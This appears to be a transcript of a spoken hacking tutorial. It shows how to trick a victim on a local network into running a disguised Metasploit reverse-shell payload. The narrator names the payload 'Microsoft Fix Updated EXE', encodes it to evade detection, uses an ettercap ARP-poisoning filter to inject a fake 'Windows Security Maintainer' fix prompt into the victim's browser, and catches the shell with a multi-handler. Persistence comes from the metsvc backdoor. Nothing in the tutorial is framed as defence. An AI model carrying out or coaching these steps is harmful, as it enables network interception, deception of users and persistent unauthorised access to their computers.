Hello guys, welcome yet to another Ronsoft tutorial. Today we're going to be looking at some deceptive kind of hacking and how to maintain your access. So what I have here is a filter file. That is basically what we're going to do is it's going to pop onto the user's browser, the victim's browser, and it's going to ask him whether he should fix the error that's going to be spoofed from our server. So what I did basically is to get a funny picture and uploaded it into my Apache server. And what we need to do right now is to go to cd/pentest exploits framework 3, and we're going to start up our payload. So payload Windows metsvc, metsvc reverse TCP LO host 92.18.12. That's my IP, and then I need to encode it that with a -t, and it's going to be an exe file. So I give it its location, and I'm going to get this NC file, and you don't have to go to school to know that this is a netcat file. So I'm going to use netcat to encode it with my payload. So the problem now that I have to do is that I don't have to get a suspicious name like Evil Hacker or maybe anything that is suspicious. I prefer to use something like Microsoft Fix Updated EXE, and I use Shikadaganya to fire up my payload, and I've given it an iteration of 5 times. I have to now take care of the filter file that we first saw from the very beginning, and that is a blind.ef. So it's done, and I need to start up my MSF console. As that's done, let me go to ettercap -f, and basically what I want to do is to poison our network with the blind.ef -m arb and a specific IP that is 192.168.88.136. That's our victims. So I use exploit multi-handler. I set my payload to Windows metsvc /reverse TCP, set my localhost 192.168.88.128. I set my local port 444 so that I can get back the shell spawn via this port. So I start up my exploit. We have a port already listening, and I set up my ettercap also. Then switch to the victim's computer to see what's taking place there. Once we're here, I'd love to first take note of the IP, and it's the 136. So what if you're just a normal user and you love going to Twitter? Even just as you start up your browser, immediately the hacker starts picking up information from your computer. So we can go to twitter.com, maybe facebook.com, and bingo, look what we see. We have please accept Windows Security Maintainer to fix the problem. And once the victim clicks onto the fix error, we're going to get a shell spawn back to our network. So how about we try it? We click, bingo, and there you may think that maybe it's trying to fix. So with that, back to the victim's the hacker's computer. He already has a shell, and he can view the current directory. He's already into your computer, and he can check out for the system info. You're working on a Windows XP Service Pack 3. He can get the current process ID, and he can get he can watch your route. He can figure out a way he can attach himself into the network or play with the route itself, and he can get the current user ID, of which is anonymous/user. And all of this said, mostly we can have all the available privileges that are available onto the system. But the most interesting thing about hacking is not just getting in, it's getting in and maintaining. There's a very wonderful backdoor called metsvc service. What we can do is you just type run metsvc and it's successfully uploaded. Please watch the next tutorial for more.